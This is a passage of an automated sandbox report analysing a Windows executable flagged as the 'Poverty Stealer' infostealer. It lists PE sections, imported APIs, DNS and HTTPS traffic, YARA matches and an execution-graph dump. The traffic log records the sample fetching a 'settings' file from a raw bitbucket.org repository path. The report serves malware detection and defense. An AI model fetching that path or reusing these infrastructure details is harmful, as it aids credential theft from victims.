                            .text | 0x1000 | 0x2a871 | 0x2aa00 | 5d92a4c0393a8d49e1de7f6b64ebe6ab | False | 0.5427339167888563 | data | 6.657676969668933 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata | 0x2c000 | 0x12176 | 0x12200 | f434dfe0511959e8280c5a216e08dd8c | False | 0.4938981681034483 | data | 5.625546128839358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data | 0x3f000 | 0x1f58 | 0x1200 | ec2b0f8bccfefd6305027b3795d46b1a | False | 0.1937934027777778 | DOS executable (block device driver \377\377\377\377) | 3.127900718317494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc | 0x41000 | 0x21f0 | 0x2200 | 506afc22f15df7ff611ca73eb0f3cce4 | False | 0.7635569852941176 | data | 6.598006424266324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            DLL | Import
                            KERNEL32.dll | GetCurrentProcess, GetModuleHandleA, Sleep, LoadLibraryA, CloseHandle, GetProcAddress, FreeLibrary, GetTickCount, CreateFileW, HeapSize, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, WriteConsoleW
                            USER32.dll | MessageBoxW


                            • Total Packets: 19
                            • 443 (HTTPS)
                            • 53 (DNS)
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 8, 2025 23:24:24.439620018 CET | 61767 | 53 | 192.168.2.5 | 1.1.1.1
                            Mar 8, 2025 23:24:24.447052956 CET | 53 | 61767 | 1.1.1.1 | 192.168.2.5

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Mar 8, 2025 23:24:24.439620018 CET | 192.168.2.5 | 1.1.1.1 | 0xc33f | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Mar 8, 2025 23:24:24.447052956 CET | 1.1.1.1 | 192.168.2.5 | 0xc33f | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
                            Mar 8, 2025 23:24:24.447052956 CET | 1.1.1.1 | 192.168.2.5 | 0xc33f | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
                            Mar 8, 2025 23:24:24.447052956 CET | 1.1.1.1 | 192.168.2.5 | 0xc33f | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
                            • bitbucket.org
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49707 | 185.166.143.48 | 443 | 8300 | C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe

                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-08 22:24:26 UTC | 164 | OUT | GET /microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settings HTTP/1.1
                            Accept: */*
                            User-Agent: Chrome/95.0.4638.54
                            Host: bitbucket.org
                            2025-03-08 22:24:27 UTC | 5107 | IN | HTTP/1.1 200 OK
                            Date: Sat, 08 Mar 2025 22:24:26 GMT
                            Content-Type: text/plain
                            Content-Length: 40280
                            Server: AtlassianEdge
                            Vary: Authorization, Accept-Language, Origin, Accept-Encoding
                            Cache-Control: s-maxage=900, max-age=900
                            Last-Modified: Sat, 08 Mar 2025 08:40:02 GMT
                            Etag: "ff3a083964c08b9e6cd494d0ba24307b"
                            X-Used-Mesh: False
                            Content-Language: en
                            X-View-Name: bitbucket.apps.repo2.views.filebrowse_raw
                            X-Dc-Location: Micros-3
                            X-Served-By: f2c19e895aef
                            X-Version: 1326d250ea44
                            X-Static-Version: 1326d250ea44
                            X-Request-Count: 147
                            X-Render-Time: 0.06316137313842773
                            X-B3-Traceid: 7d750533d8b1458e8101d7c09f02fa1d
                            X-B3-Spanid: e43b765da1c42613
                            X-Frame-Options: SAMEORIGIN
                            Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci [TRUNCATED]
                            X-Usage-Quota-Remaining: 998018.043
                            X-Usage-Request-Cost: 1816.07
                            X-Usage-User-Time: 0.030039
                            X-Usage-System-Time: 0.008443
                            X-Usage-Input-Ops: 64
                            X-Usage-Output-Ops: 0
                            Age: 0
                            Accept-Ranges: bytes
                            X-Cache: MISS
                            X-Content-Type-Options: nosniff
                            X-Xss-Protection: 1; mode=block
                            Atl-Traceid: 7d750533d8b1458e8101d7c09f02fa1d
                            Atl-Request-Id: 7d750533-d8b1-458e-8101-d7c09f02fa1d
                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                            Server-Timing: atl-edge;dur=172,atl-edge-internal;dur=3,atl-edge-upstream;dur=170,atl-edge-pop;desc="aws-eu-central-1"
                            Connection: close

                            Target ID:0
                            Start time:17:24:22
                            Start date:08/03/2025
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe"
                            Imagebase:0x300000
                            File size:263'168 bytes
                            MD5 hash:F9FE873316A74E0D1C93357A904E133F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Execution Graph

                            Execution Coverage:5.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:1.8%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:60
17899->17921 17901 31ae2b 17902 31ae34 17901->17902 17903 31ae46 TlsGetValue 17901->17903 17902->17880 17905 31ac78 std::_Lockit::_Lockit 5 API calls 17904->17905 17906 31ae6a 17905->17906 17907 319539 17906->17907 17908 31ae88 TlsSetValue 17906->17908 17907->17896 17909 3196e7 17907->17909 17914 3196f4 __Getctype 17909->17914 17910 319734 17913 315b3e __dosmaperr 13 API calls 17910->17913 17911 31971f RtlAllocateHeap 17912 31954e 17911->17912 17911->17914 17912->17885 17912->17886 17913->17912 17914->17910 17914->17911 17935 3163fa 17914->17935 17949 319072 17916->17949 17922 31aca8 17921->17922 17926 31aca4 std::_Lockit::_Lockit 17921->17926 17922->17926 17927 31abad 17922->17927 17925 31acc2 GetProcAddress 17925->17926 17926->17901 17933 31abbe ___vcrt_FlsSetValue 17927->17933 17928 31ac54 17928->17925 17928->17926 17929 31abdc LoadLibraryExW 17930 31abf7 GetLastError 17929->17930 17931 31ac5b 17929->17931 17930->17933 17931->17928 17932 31ac6d FreeLibrary 17931->17932 17932->17928 17933->17928 17933->17929 17934 31ac2a LoadLibraryExW 17933->17934 17934->17931 17934->17933 17938 316426 17935->17938 17939 316432 ___scrt_is_nonwritable_in_current_image 17938->17939 17944 313a77 EnterCriticalSection 17939->17944 17941 31643d __InternalCxxFrameHandler 17945 316474 17941->17945 17944->17941 17948 313abf LeaveCriticalSection 17945->17948 17947 316405 17947->17914 17948->17947 17950 31907e ___scrt_is_nonwritable_in_current_image 17949->17950 17963 313a77 EnterCriticalSection 17950->17963 17952 319088 17964 3190b8 17952->17964 17955 319184 17956 319190 ___scrt_is_nonwritable_in_current_image 17955->17956 17968 313a77 EnterCriticalSection 17956->17968 17958 31919a 17969 319365 17958->17969 17960 3191b2 17973 3191d2 17960->17973 17963->17952 17967 313abf LeaveCriticalSection 17964->17967 17966 3190a6 17966->17955 17967->17966 17968->17958 17970 31939b __Getctype 17969->17970 17971 319374 __Getctype 17969->17971 17970->17960 17971->17970 17976 32151a 17971->17976 18090 
313abf LeaveCriticalSection 17973->18090 17975 3191c0 17975->17898 17977 32159a 17976->17977 17982 321530 17976->17982 17978 3215e8 17977->17978 17980 319744 ___free_lconv_mon 14 API calls 17977->17980 18044 32168b 17978->18044 17983 3215bc 17980->17983 17981 321563 17984 321585 17981->17984 17993 319744 ___free_lconv_mon 14 API calls 17981->17993 17982->17977 17982->17981 17987 319744 ___free_lconv_mon 14 API calls 17982->17987 17985 319744 ___free_lconv_mon 14 API calls 17983->17985 17986 319744 ___free_lconv_mon 14 API calls 17984->17986 17988 3215cf 17985->17988 17989 32158f 17986->17989 17991 321558 17987->17991 17994 319744 ___free_lconv_mon 14 API calls 17988->17994 17997 319744 ___free_lconv_mon 14 API calls 17989->17997 17990 321656 17998 319744 ___free_lconv_mon 14 API calls 17990->17998 18004 32081e 17991->18004 17992 3215f6 17992->17990 18003 319744 14 API calls ___free_lconv_mon 17992->18003 17995 32157a 17993->17995 17996 3215dd 17994->17996 18032 320c7d 17995->18032 18001 319744 ___free_lconv_mon 14 API calls 17996->18001 17997->17977 18002 32165c 17998->18002 18001->17978 18002->17970 18003->17992 18005 32082f 18004->18005 18031 320918 18004->18031 18006 320840 18005->18006 18008 319744 ___free_lconv_mon 14 API calls 18005->18008 18007 320852 18006->18007 18009 319744 ___free_lconv_mon 14 API calls 18006->18009 18010 320864 18007->18010 18011 319744 ___free_lconv_mon 14 API calls 18007->18011 18008->18006 18009->18007 18012 320876 18010->18012 18013 319744 ___free_lconv_mon 14 API calls 18010->18013 18011->18010 18014 320888 18012->18014 18015 319744 ___free_lconv_mon 14 API calls 18012->18015 18013->18012 18016 319744 ___free_lconv_mon 14 API calls 18014->18016 18017 32089a 18014->18017 18015->18014 18016->18017 18018 319744 ___free_lconv_mon 14 API calls 18017->18018 18019 3208ac 18017->18019 18018->18019 18020 3208be 18019->18020 18021 319744 ___free_lconv_mon 14 API calls 18019->18021 18022 3208d0 18020->18022 18024 319744 ___free_lconv_mon 14 
API calls 18020->18024 18021->18020 18023 3208e2 18022->18023 18025 319744 ___free_lconv_mon 14 API calls 18022->18025 18026 3208f4 18023->18026 18027 319744 ___free_lconv_mon 14 API calls 18023->18027 18024->18022 18025->18023 18028 320906 18026->18028 18029 319744 ___free_lconv_mon 14 API calls 18026->18029 18027->18026 18030 319744 ___free_lconv_mon 14 API calls 18028->18030 18028->18031 18029->18028 18030->18031 18031->17981 18033 320c8a 18032->18033 18043 320ce2 18032->18043 18034 320c9a 18033->18034 18036 319744 ___free_lconv_mon 14 API calls 18033->18036 18035 320cac 18034->18035 18037 319744 ___free_lconv_mon 14 API calls 18034->18037 18038 320cbe 18035->18038 18039 319744 ___free_lconv_mon 14 API calls 18035->18039 18036->18034 18037->18035 18040 320cd0 18038->18040 18041 319744 ___free_lconv_mon 14 API calls 18038->18041 18039->18038 18042 319744 ___free_lconv_mon 14 API calls 18040->18042 18040->18043 18041->18040 18042->18043 18043->17984 18045 321698 18044->18045 18049 3216b7 18044->18049 18045->18049 18050 3211a4 18045->18050 18048 319744 ___free_lconv_mon 14 API calls 18048->18049 18049->17992 18051 321282 18050->18051 18052 3211b5 18050->18052 18051->18048 18086 320f03 18052->18086 18055 320f03 __Getctype 14 API calls 18056 3211c8 18055->18056 18057 320f03 __Getctype 14 API calls 18056->18057 18058 3211d3 18057->18058 18059 320f03 __Getctype 14 API calls 18058->18059 18060 3211de 18059->18060 18061 320f03 __Getctype 14 API calls 18060->18061 18062 3211ec 18061->18062 18063 319744 ___free_lconv_mon 14 API calls 18062->18063 18064 3211f7 18063->18064 18065 319744 ___free_lconv_mon 14 API calls 18064->18065 18066 321202 18065->18066 18067 319744 ___free_lconv_mon 14 API calls 18066->18067 18068 32120d 18067->18068 18069 320f03 __Getctype 14 API calls 18068->18069 18070 32121b 18069->18070 18071 320f03 __Getctype 14 API calls 18070->18071 18072 321229 18071->18072 18073 320f03 __Getctype 14 API calls 18072->18073 18074 32123a 18073->18074 18075 320f03 
__Getctype 14 API calls 18074->18075 18076 321248 18075->18076 18077 320f03 __Getctype 14 API calls 18076->18077 18078 321256 18077->18078 18079 319744 ___free_lconv_mon 14 API calls 18078->18079 18080 321261 18079->18080 18081 319744 ___free_lconv_mon 14 API calls 18080->18081 18082 32126c 18081->18082 18083 319744 ___free_lconv_mon 14 API calls 18082->18083 18084 321277 18083->18084 18085 319744 ___free_lconv_mon 14 API calls 18084->18085 18085->18051 18088 320f15 18086->18088 18087 320f24 18087->18055 18088->18087 18089 319744 ___free_lconv_mon 14 API calls 18088->18089 18089->18088 18090->17975 19790 301022 19795 30b6b0 19790->19795 19792 301035 19799 30d033 19792->19799 19796 30b6bc __EH_prolog3 19795->19796 19802 308540 19796->19802 19798 30b70e codecvt 19798->19792 19856 30d005 19799->19856 19803 30cd92 codecvt 41 API calls 19802->19803 19804 3085b4 19803->19804 19813 30c465 19804->19813 19806 3085c4 19807 308670 76 API calls 19806->19807 19808 3085f7 19807->19808 19809 30863a 19808->19809 19810 3023a0 41 API calls 19808->19810 19811 308646 19809->19811 19825 30c67e 19809->19825 19810->19809 19811->19798 19814 30c471 __EH_prolog3 19813->19814 19815 30b56a std::_Lockit::_Lockit 7 API calls 19814->19815 19816 30c47c 19815->19816 19824 30c4ad 19816->19824 19830 30c5c9 19816->19830 19818 30b5c2 std::_Lockit::~_Lockit 2 API calls 19820 30c4ea codecvt 19818->19820 19819 30c48f 19836 30c5ec 19819->19836 19820->19806 19823 30c3bc _Yarn 15 API calls 19823->19824 19824->19818 19826 30b56a std::_Lockit::_Lockit 7 API calls 19825->19826 19827 30c68c 19826->19827 19828 30b5c2 std::_Lockit::~_Lockit 2 API calls 19827->19828 19829 30c6c7 19828->19829 19829->19811 19831 30cd92 codecvt 41 API calls 19830->19831 19832 30c5d4 19831->19832 19833 30c5e8 19832->19833 19840 30c2fb 19832->19840 19833->19819 19837 30c5f8 19836->19837 19838 30c497 19836->19838 19843 30cb62 19837->19843 19838->19823 19841 30c3bc _Yarn 15 API calls 19840->19841 19842 30c335 19841->19842 19842->19819 
19844 315b51 19843->19844 19845 30cb72 EncodePointer 19843->19845 19846 31eecc __InternalCxxFrameHandler 2 API calls 19844->19846 19845->19838 19845->19844 19847 315b56 19846->19847 19848 315b61 19847->19848 19849 31ef11 __InternalCxxFrameHandler 39 API calls 19847->19849 19850 315b6b IsProcessorFeaturePresent 19848->19850 19851 315b8a 19848->19851 19849->19848 19852 315b77 19850->19852 19853 311b3f __InternalCxxFrameHandler 21 API calls 19851->19853 19854 3115e3 __InternalCxxFrameHandler 8 API calls 19852->19854 19855 315b94 19853->19855 19854->19851 19857 30d014 19856->19857 19858 30d01b 19856->19858 19862 316db4 19857->19862 19865 316e31 19858->19865 19861 30103f 19863 316e31 42 API calls 19862->19863 19864 316dc6 19863->19864 19864->19861 19868 316b7d 19865->19868 19869 316b89 ___scrt_is_nonwritable_in_current_image 19868->19869 19876 313a77 EnterCriticalSection 19869->19876 19871 316b97 19877 316bd8 19871->19877 19873 316ba4 19887 316bcc 19873->19887 19876->19871 19878 316bf3 19877->19878 19886 316c66 std::_Lockit::_Lockit 19877->19886 19885 316c46 19878->19885 19878->19886 19890 320310 19878->19890 19880 320310 42 API calls 19882 316c5c 19880->19882 19881 316c3c 19884 319744 ___free_lconv_mon 14 API calls 19881->19884 19883 319744 ___free_lconv_mon 14 API calls 19882->19883 19883->19886 19884->19885 19885->19880 19885->19886 19886->19873 19918 313abf LeaveCriticalSection 19887->19918 19889 316bb5 19889->19861 19891 320338 19890->19891 19892 32031d 19890->19892 19894 320347 19891->19894 19899 3258af 19891->19899 19892->19891 19893 320329 19892->19893 19895 315b3e __dosmaperr 14 API calls 19893->19895 19906 31f103 19894->19906 19898 32032e __fread_nolock 19895->19898 19898->19881 19900 3258ba 19899->19900 19901 3258cf HeapSize 19899->19901 19902 315b3e __dosmaperr 14 API calls 19900->19902 19901->19894 19903 3258bf 19902->19903 19904 3117df __fread_nolock 39 API calls 19903->19904 19905 3258ca 19904->19905 19905->19894 19907 31f110 19906->19907 19908 31f11b 
19906->19908 19909 31977e std::_Locinfo::_Locinfo_dtor 15 API calls 19907->19909 19910 31f123 19908->19910 19916 31f12c __Getctype 19908->19916 19915 31f118 19909->19915 19913 319744 ___free_lconv_mon 14 API calls 19910->19913 19911 31f131 19914 315b3e __dosmaperr 14 API calls 19911->19914 19912 31f156 HeapReAlloc 19912->19915 19912->19916 19913->19915 19914->19915 19915->19898 19916->19911 19916->19912 19917 3163fa codecvt 2 API calls 19916->19917 19917->19916 19918->19889 22619 30bf08 22620 30bf40 22619->22620 22621 30bf11 22619->22621 22621->22620 22624 3140e4 22621->22624 22623 30bf33 22625 3140f6 22624->22625 22627 3140ff ___scrt_uninitialize_crt 22624->22627 22626 313f6c ___scrt_uninitialize_crt 68 API calls 22625->22626 22628 3140fc 22626->22628 22629 31410e 22627->22629 22632 313f0c 22627->22632 22628->22623 22629->22623 22633 313f18 ___scrt_is_nonwritable_in_current_image 22632->22633 22640 313c57 EnterCriticalSection 22633->22640 22635 313f26 22636 314076 ___scrt_uninitialize_crt 68 API calls 22635->22636 22637 313f37 22636->22637 22641 313f60 22637->22641 22640->22635 22644 313c6b LeaveCriticalSection 22641->22644 22643 313f49 22643->22623 22644->22643 18562 30d10d 18563 30d119 ___scrt_is_nonwritable_in_current_image 18562->18563 18588 30ce6c 18563->18588 18565 30d120 18566 30d273 18565->18566 18576 30d14a ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 18565->18576 18711 30d779 IsProcessorFeaturePresent 18566->18711 18568 30d27a 18693 311b7b 18568->18693 18571 311b3f __InternalCxxFrameHandler 21 API calls 18572 30d288 18571->18572 18573 30d169 18574 30d1ea 18596 30d88e 18574->18596 18576->18573 18576->18574 18696 311b55 18576->18696 18577 30d1f0 18599 3059a0 18577->18599 18589 30ce75 18588->18589 18715 30d2a1 IsProcessorFeaturePresent 18589->18715 18593 30ce86 18594 30ce8a 18593->18594 18725 30ff5d 18593->18725 18594->18565 18785 30ea20 18596->18785 18598 30d8a1 GetStartupInfoW 18598->18577 18600 3059b0 
___scrt_uninitialize_crt 18599->18600 18787 3138b9 GetSystemTimeAsFileTime 18600->18787 18602 3059b9 18789 311bbd 18602->18789 18606 3059ca 18798 308790 18606->18798 18610 305a6a 18611 308790 69 API calls 18610->18611 18612 305a81 18611->18612 18613 308a30 76 API calls 18612->18613 18614 305a87 18613->18614 18615 308790 69 API calls 18614->18615 18616 305a99 18615->18616 18816 3068e0 18616->18816 18619 308790 69 API calls 18620 305aad 18619->18620 18621 308a30 76 API calls 18620->18621 18650 305ab3 error_info_injector 18621->18650 18622 305ce6 18623 308790 69 API calls 18622->18623 18625 305cf5 18623->18625 18638 306d20 41 API calls 18638->18650 18650->18622 18650->18638 18659 306226 18650->18659 18826 30cd92 18650->18826 18837 311b9c 18650->18837 18840 309f90 18650->18840 18928 3015e0 18650->18928 18953 3117ef 18659->18953 18694 3119af __InternalCxxFrameHandler 21 API calls 18693->18694 18695 30d280 18694->18695 18695->18571 18697 311b6b ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 18696->18697 18697->18574 18698 3193b0 __Getctype 39 API calls 18697->18698 18701 318881 18698->18701 18699 315b51 CallUnexpected 39 API calls 18700 3188ab 18699->18700 18701->18699 18712 30d78f __InternalCxxFrameHandler __fread_nolock 18711->18712 18713 30d83a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18712->18713 18714 30d87e __InternalCxxFrameHandler 18713->18714 18714->18568 18716 30ce81 18715->18716 18717 30ff3e 18716->18717 18731 31105c 18717->18731 18721 30ff4f 18722 30ff5a 18721->18722 18745 311098 18721->18745 18722->18593 18724 30ff47 18724->18593 18726 30ff70 18725->18726 18727 30ff66 18725->18727 18726->18594 18728 310281 ___vcrt_uninitialize_ptd 6 API calls 18727->18728 18729 30ff6b 18728->18729 18730 311098 ___vcrt_uninitialize_locks DeleteCriticalSection 18729->18730 18730->18726 18732 311065 18731->18732 18734 31108e 18732->18734 18735 30ff43 18732->18735 18749 311411 18732->18749 18736 311098 ___vcrt_uninitialize_locks 
DeleteCriticalSection 18734->18736 18735->18724 18737 31024e 18735->18737 18736->18735 18766 311322 18737->18766 18740 310263 18740->18721 18743 31027e 18743->18721 18746 3110c2 18745->18746 18747 3110a3 18745->18747 18746->18724 18748 3110ad DeleteCriticalSection 18747->18748 18748->18746 18748->18748 18754 311237 18749->18754 18752 311449 InitializeCriticalSectionAndSpinCount 18753 311434 18752->18753 18753->18732 18755 311254 18754->18755 18758 311258 18754->18758 18755->18752 18755->18753 18756 3112c0 GetProcAddress 18756->18755 18758->18755 18758->18756 18759 3112b1 18758->18759 18761 3112d7 LoadLibraryExW 18758->18761 18759->18756 18760 3112b9 FreeLibrary 18759->18760 18760->18756 18762 31131e 18761->18762 18763 3112ee GetLastError 18761->18763 18762->18758 18763->18762 18764 3112f9 ___vcrt_FlsSetValue 18763->18764 18764->18762 18765 31130f LoadLibraryExW 18764->18765 18765->18758 18767 311237 ___vcrt_FlsSetValue 5 API calls 18766->18767 18768 31133c 18767->18768 18769 311355 TlsAlloc 18768->18769 18770 310258 18768->18770 18770->18740 18771 3113d3 18770->18771 18772 311237 ___vcrt_FlsSetValue 5 API calls 18771->18772 18773 3113ed 18772->18773 18774 311408 TlsSetValue 18773->18774 18775 310271 18773->18775 18774->18775 18775->18743 18776 310281 18775->18776 18777 310291 18776->18777 18778 31028b 18776->18778 18777->18740 18780 31135d 18778->18780 18781 311237 ___vcrt_FlsSetValue 5 API calls 18780->18781 18782 311377 18781->18782 18783 31138f TlsFree 18782->18783 18784 311383 18782->18784 18783->18784 18784->18777 18786 30ea37 18785->18786 18786->18598 18786->18786 18788 3138f2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18787->18788 18788->18602 18790 3193b0 __Getctype 39 API calls 18789->18790 18791 3059c2 18790->18791 18792 30c7b8 18791->18792 18980 3153ea 18792->18980 18794 30c7c5 18795 30c7ca 18794->18795 18994 30ae0c 18794->18994 18795->18606 18799 3087c6 18798->18799 18803 30882c 18799->18803 19054 3082f0 18799->19054 18807 308861 18803->18807 19041 
309ab0 18803->19041 18804 3089ec 18805 305a64 18804->18805 19062 308410 18804->19062 18808 308a30 18805->18808 19044 3023a0 18807->19044 18809 308a66 18808->18809 19221 308670 18809->19221 18814 3082f0 41 API calls 18815 308ab6 18814->18815 18815->18610 18817 306930 18816->18817 18818 3082f0 41 API calls 18817->18818 18819 306949 18817->18819 18818->18819 18825 3069a4 18819->18825 19609 308b00 18819->19609 18820 3023a0 41 API calls 18823 306a73 18820->18823 18822 305aa1 18822->18619 18823->18822 18824 308410 41 API calls 18823->18824 18824->18822 18825->18820 18829 30cd97 18826->18829 18827 315152 ___std_exception_copy 15 API calls 18827->18829 18828 30cdb1 18828->18650 18829->18827 18829->18828 18830 3163fa codecvt 2 API calls 18829->18830 18832 301190 Concurrency::cancel_current_task 18829->18832 18830->18829 18838 3193b0 __Getctype 39 API calls 18837->18838 18839 311ba1 18838->18839 18839->18650 18841 30a16b 18840->18841 18849 309fd1 18840->18849 18842 309d00 41 API calls 18841->18842 18843 309ff1 18845 30a166 18849->18843 18849->18845 18850 30a062 18849->18850 18851 30a038 18849->18851 18852 30a026 18849->18852 18851->18843 18851->18845 18929 30170a 18928->18929 18932 301604 18928->18932 18930 301230 41 API calls 18929->18930 18934 301678 18932->18934 18935 30166b 18932->18935 18937 30161a 18932->18937 18940 30162a _Yarn 18932->18940 18935->18937 18954 31172b __fread_nolock 39 API calls 18953->18954 18981 3153f6 18980->18981 18982 31540b 18980->18982 18983 315b3e __dosmaperr 14 API calls 18981->18983 18999 31b05e 18982->18999 18985 3153fb 18983->18985 18987 3117df __fread_nolock 39 API calls 18985->18987 18990 315406 18987->18990 18988 31542e 18988->18794 18989 315b3e __dosmaperr 14 API calls 18991 31541f 18989->18991 18990->18794 18992 315b3e __dosmaperr 14 API calls 18991->18992 18993 31542a 18992->18993 18993->18794 19005 30ad47 18994->19005 18998 30ae2b 19000 31ac78 std::_Lockit::_Lockit 5 API calls 18999->19000 19001 31b07a 19000->19001 19002 315b51 
CallUnexpected 39 API calls 19001->19002 19004 315416 19001->19004 19003 31b09d 19002->19003 19004->18988 19004->18989 19011 3017b0 19005->19011 19008 30e360 19009 30e3a8 RaiseException 19008->19009 19010 30e37a 19008->19010 19009->18998 19010->19009 19014 30e0fd 19011->19014 19015 30e10a 19014->19015 19021 3017dd 19014->19021 19015->19015 19015->19021 19022 315152 19015->19022 19018 30e137 19038 313921 19018->19038 19021->19008 19027 31977e __Getctype 19022->19027 19023 3197bc 19025 315b3e __dosmaperr 14 API calls 19023->19025 19024 3197a7 RtlAllocateHeap 19026 30e127 19024->19026 19024->19027 19025->19026 19026->19018 19029 31890b 19026->19029 19027->19023 19027->19024 19028 3163fa codecvt 2 API calls 19027->19028 19028->19027 19030 318919 19029->19030 19031 318927 19029->19031 19030->19031 19036 31893f 19030->19036 19032 315b3e __dosmaperr 14 API calls 19031->19032 19033 31892f 19032->19033 19034 3117df __fread_nolock 39 API calls 19033->19034 19035 318939 19034->19035 19035->19018 19036->19035 19037 315b3e __dosmaperr 14 API calls 19036->19037 19037->19033 19039 319744 ___free_lconv_mon 14 API calls 19038->19039 19040 313939 19039->19040 19040->19021 19066 30c21b 19041->19066 19042 309ac6 19042->18807 19045 3023ba 19044->19045 19045->18804 19046 30e360 Concurrency::cancel_current_task RaiseException 19045->19046 19047 3023d2 19045->19047 19046->19047 19137 3022c0 19047->19137 19049 302408 19050 30e360 Concurrency::cancel_current_task RaiseException 19049->19050 19051 302417 19050->19051 19052 30e0fd ___std_exception_copy 40 API calls 19051->19052 19053 302444 19052->19053 19053->18804 19055 308327 19054->19055 19059 3083d8 19054->19059 19217 307980 19055->19217 19057 3083c7 19057->19059 19061 308410 41 API calls 19057->19061 19059->18803 19060 3023a0 41 API calls 19060->19057 19061->19059 19063 308471 19062->19063 19064 308446 19062->19064 19063->18805 19064->19063 19065 3023a0 41 API calls 19064->19065 19065->19063 19067 30c23d _Yarn 19066->19067 19069 30c22a 
19066->19069 19067->19069 19070 314db3 19067->19070 19069->19042 19071 314dc6 _Fputc 19070->19071 19076 314b95 19071->19076 19073 314ddb 19074 31151b _Fputc 39 API calls 19073->19074 19075 314de8 19074->19075 19075->19069 19077 314ba3 19076->19077 19082 314bcb 19076->19082 19078 314bb0 19077->19078 19079 314bd2 19077->19079 19077->19082 19080 311762 _Fputc 39 API calls 19078->19080 19084 314aee 19079->19084 19080->19082 19082->19073 19085 314afa ___scrt_is_nonwritable_in_current_image 19084->19085 19092 313c57 EnterCriticalSection 19085->19092 19087 314b08 19093 314b49 19087->19093 19092->19087 19103 31a6f8 19093->19103 19100 314b3d 19136 313c6b LeaveCriticalSection 19100->19136 19102 314b26 19102->19073 19104 31a6ba 39 API calls 19103->19104 19106 31a709 19104->19106 19105 314b61 19110 314c0c 19105->19110 19106->19105 19123 31977e 19106->19123 19109 319744 ___free_lconv_mon 14 API calls 19109->19105 19113 314c1e 19110->19113 19114 314b7f 19110->19114 19111 